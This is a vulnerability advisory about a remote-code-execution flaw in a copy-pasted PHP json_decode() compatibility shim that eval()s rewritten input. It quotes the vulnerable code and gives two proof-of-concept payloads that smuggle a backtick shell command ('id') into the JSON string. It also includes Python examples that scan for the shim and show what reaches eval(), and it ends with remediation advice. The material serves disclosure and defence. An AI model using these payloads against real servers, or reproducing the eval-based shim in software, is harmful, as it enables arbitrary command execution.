Just Another Hacker

JAHx221 - RCE in copy/pasted PHP compat libraries, json_decode function

Several PHP compatibility libraries contain a potential remote code execution flaw in their json_decode() function, the result of copy-pasting an existing vulnerable implementation.

Identifiers

  • JAHx221 - http://www.justanotherhacker.com/advisories/JAHx221.txt

Affected components

  • WassUp Realtime analytics WordPress plugin/compat library - https://wordpress.org/plugins/wassup/
  • AjaXplorer Core - https://pydio.com/en/community/releases/pydio-core/ajaxplorer-core-503-released
  • FlexoCMS - https://github.com/flexocms/flexo1.source
  • Various code - https://github.com/search?p=6&q=if+function_exists+json_decode+eval+%24out&type=Code
  • compat_functions.php - http://techfromhel.com

Description

This appears to date back to a compatibility library published in 2010 and appears in several code bases, with little or no variation.

The vulnerable code generally shares the following characteristics:

  • The json_decode function is declared only if it does not already exist
  • str_replace() is used to rewrite the JSON text into PHP array syntax
  • eval($out) is called on the rewritten string

Since eval() executes arbitrary PHP, it is generally considered unsafe to use it on user-controlled or user-influenced data. Practical exploitation is nonetheless unclear: the function_exists() guard means the shim is only defined where no native json_decode() exists, i.e. PHP older than 5.2 or a build with the json extension disabled, so on most deployments the vulnerable code is present in the code base but never runs.

/**
 * compat_functions.php
 * Description: Emulate some functions from PHP 5.2+ and Wordpress 2.6+ for
 *   backwards compatibility with PHP 4.3+ and Wordpress 2.2+, respectively
 * @author: Helene D. <http://techfromhel.com>
 * @version: 0.3 - 2010-09-13
 * @since Wassup 1.8
 */

/**
 * Convert simple JSON data into a PHP object (default) or associative
 *   array. Emulates 'json_decode' function from PHP 5.2+
 * @author: Helene Duncker <http://techfromhel.com>
 * @param string,boolean
 * @return (array or object)
 */
if (!function_exists('json_decode')) {
    function json_decode($json,$to_array=false) {
        $x=false;
        if (!empty($json) && strpos($json,'{"')!==false) {
            // Rewrite the JSON text into PHP syntax, then eval() the result:
            $out = '$x='.str_replace(array('{','":','}'),array('array(','"=>',')'),$json);
            eval($out.';');
            if (!$to_array) $x = (object) $x;
        }
        return $x;
    } //end function json_decode
}
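Because the flaw spreads by copy-paste, the practical task is finding every copy in a code base. The following is an added example, not part of the advisory or of any of the affected projects: a small scanner keyed on the characteristics listed above, a json_decode() declaration guarded by function_exists() whose body reaches eval(). The two PHP sources it scans are constructed for the example; the first mirrors the shim's shape, the second is a guard that fails closed instead.

```python
# Added example (not part of the advisory): scanner for the copy-pasted
# json_decode() shim. Finds a function_exists('json_decode') guard, the
# json_decode() declaration after it, and an eval() inside that body.
# VULNERABLE_SRC and SAFE_SRC are constructed PHP sources for this example.
import re

VULNERABLE_SRC = """<?php
if (!function_exists('json_decode')) {
function json_decode($json,$to_array=false) {
$x=false;
if (!empty($json) && strpos($json,'{"')!==false) {
$out = '$x='.str_replace(array('{','":','}'),array('array(','"=>',')'),$json);
eval($out.';');
if (!$to_array) $x = (object) $x;
}
return $x;
}
}
"""

# A guard that fails closed instead of evaluating its input (constructed, for contrast).
SAFE_SRC = """<?php
if (!function_exists('json_decode')) {
    function json_decode($json, $assoc = false) {
        trigger_error('json extension is required', E_USER_ERROR);
        return null;
    }
}
"""

GUARD_RE = re.compile(r"""function_exists\(\s*['"]json_decode['"]\s*\)""")
DECL_RE = re.compile(r"function\s+json_decode\s*\(")
EVAL_RE = re.compile(r"\beval\s*\(")
# Single- and double-quoted PHP string literals, with backslash escapes.
STRING_RE = re.compile(r"'(?:\\.|[^'\\])*'" + r'|"(?:\\.|[^"\\])*"', re.S)


def _blank_strings(src):
    """Overwrite quoted literals with spaces of the same length, so offsets still
    line up but braces inside strings such as '{' and '}' do not confuse matching."""
    return STRING_RE.sub(lambda m: " " * len(m.group(0)), src)


def _body_span(blanked, pos):
    """Return (open, close) offsets of the first brace-delimited block at or after pos."""
    start = blanked.find("{", pos)
    if start == -1:
        return None
    depth = 0
    for i in range(start, len(blanked)):
        if blanked[i] == "{":
            depth += 1
        elif blanked[i] == "}":
            depth -= 1
            if depth == 0:
                return start, i
    return None


def find_json_shim_eval(src):
    """Return [(guard_line, eval_line), ...] for every function_exists('json_decode')
    guard followed by a json_decode() declaration whose body calls eval()."""
    blanked = _blank_strings(src)
    findings = []
    for guard in GUARD_RE.finditer(src):
        decl = DECL_RE.search(src, guard.end())
        if not decl:
            continue
        span = _body_span(blanked, decl.end())
        if not span:
            continue
        start, end = span
        # Search the blanked text so an 'eval(' inside a string literal is ignored.
        ev = EVAL_RE.search(blanked, start, end)
        if ev:
            findings.append((src.count("\n", 0, guard.start()) + 1,
                             src.count("\n", 0, ev.start()) + 1))
    return findings


if __name__ == "__main__":
    for name, src in (("vulnerable", VULNERABLE_SRC), ("safe", SAFE_SRC)):
        print(name, find_json_shim_eval(src))
```

Run over the constructed sources it reports the guard on line 2 and the eval on line 7 of the vulnerable shim, and nothing for the fail-closed guard. The brace matching is deliberately done on a copy with string literals blanked out, since the shim itself contains '{' and '}' inside str_replace() arguments.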

Proof of Concept

The eval() can be exploited in a number of ways, with either full or partial control of the JSON string:

/* Payload
   `id`;//{"
*/
json_decode('`id`;//{"');

or with partially controlled content, where the attacker closes the array literal, appends a statement and comments out the remainder:

/* Payload
   {"key":"value");echo `id`;//"}
*/
json_decode('{"key":"value");echo `id`;//"}');
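To see why both payloads work it helps to look at the exact text the shim hands to eval(). The following is an added example, not the advisory's or the library's code: it re-implements only the str_replace() step of the shim in Python, so the resulting PHP statement can be inspected without a PHP 4 host, and contrasts it with a real JSON parser, which either returns data or raises and never executes anything. The two payloads are the ones above; the benign document is constructed.

```python
# Added example (not the advisory's code): the shim's str_replace() step,
# re-implemented in Python so the text passed to eval() can be inspected.
# PAYLOAD_* are the advisory's payloads; BENIGN is a constructed input.
import json

# Same pairs, same order, as the shim's str_replace(array(...), array(...), $json):
# each pair is applied over the whole string before the next one.
REPLACEMENTS = [("{", "array("), ('":', '"=>'), ("}", ")")]

PAYLOAD_FULL = '`id`;//{"'
PAYLOAD_PARTIAL = '{"key":"value");echo `id`;//"}'
BENIGN = '{"key":"value"}'


def shim_eval_text(json_text):
    """Return the PHP code the shim would pass to eval(), i.e. '$x=' . str_replace(...) . ';',
    or None where its strpos($json, '{"') guard would skip the eval entirely."""
    if not json_text or '{"' not in json_text:
        return None
    out = json_text
    for old, new in REPLACEMENTS:
        out = out.replace(old, new)
    return "$x=" + out + ";"


def statements(php_code):
    """Rough split of the eval'd text into the statements PHP would run: drop the
    '//' comment the payloads append, then split on ';'. Illustrative only; it does
    not tokenise PHP, so a ';' inside a string literal would be miscounted."""
    code = php_code.split("//", 1)[0]
    return [s.strip() for s in code.split(";") if s.strip()]


def native_parser_accepts(json_text):
    """A real JSON parser (here Python's) returns data or raises; it never runs code."""
    try:
        json.loads(json_text)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for label, text in (("full", PAYLOAD_FULL), ("partial", PAYLOAD_PARTIAL), ("benign", BENIGN)):
        code = shim_eval_text(text)
        print(label, "| eval():", code, "| statements:", statements(code),
              "| native parser accepts:", native_parser_accepts(text))
```

For the fully controlled payload the eval'd text is $x=`id`;//array("; which in PHP assigns the output of the backtick (shell_exec) operator to $x and comments out the rest. The partially controlled payload yields $x=array("key"=>"value");echo `id`;//"); so the legitimate assignment runs first and the injected echo follows as a second statement. The benign document becomes the single statement $x=array("key"=>"value");, which is the only case the shim was written for. A native parser rejects both payloads outright and accepts the benign one.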

Credit

Eldar “Wireghoul” Marcussen

Solution

Ensure json_decode is present as a native function for your PHP installation, and remove the compatibility shim: json_decode() has been built in since PHP 5.2, and from PHP 8.0 the json extension can no longer be disabled. If a fallback must remain for older builds, have it fail closed (return an error) rather than rewrite and eval() its input.
